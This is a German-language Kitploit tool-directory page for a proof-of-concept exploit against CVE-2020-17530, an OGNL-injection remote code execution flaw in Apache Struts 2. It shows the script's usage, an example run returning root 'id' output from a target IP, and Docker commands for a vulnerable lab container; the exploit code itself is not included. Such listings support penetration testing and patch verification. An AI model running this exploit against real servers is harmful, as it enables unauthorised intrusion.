Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-17530 — Proof-of-Concept-Exploit für CVE-2020-17530, eine Sicherheitslücke zur Remotecodeausführung in Apache Struts 2 mittels OGNL-Injection. Enthält ein Python-Skript zum Ausrichten auf angreifbare Struts-Instanzen. | Kitploit
Tools/GitHubGitHub/cyborgsecurity/cve-2020-17530
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingArchived
GitHubcyborgsecurity/cve-2020-17530

CVE-2020-17530

Proof-of-Concept-Exploit für CVE-2020-17530, eine Sicherheitslücke zur Remotecodeausführung in Apache Struts 2 mittels OGNL-Injection. Enthält ein Python-Skript zum Ausrichten auf angreifbare Struts-Instanzen.

Repository anzeigen
432vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-17530

Schneller PoC für CVE-2020-17530. In Apache Struts Versionen 2.0.0 - 2.5.25 kann eine erzwungene Auswertung der Object Graph Navigational Language (OGNL) auf rohe Benutzereingaben in Tag-Attributen zu Remote-Code-Ausführung (RCE) führen.

root@kitploit:~
$ python CVE-2020-17530.py --help
usage: CVE-2020-17530.py [-h] [-c COMMAND] [-n NAME] [-p PORT] [-t TARGET] [-u URI]

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        command
  -n NAME, --name NAME  form data name
  -p PORT, --port PORT  port
  -t TARGET, --target TARGET
                        target
  -u URI, --uri URI     uri

$ python CVE-2020-17530.py --target 10.10.30.62 --port 8080 --uri "/index.action" --command id
uid=0(root) gid=0(root) groups=0(root)

Einrichtung

root@kitploit:~
$ docker pull vulhub/struts2:2.5.25
$ docker run -d -p 8080:8080 vulhub/struts2:2.5.25
Tool herunterladen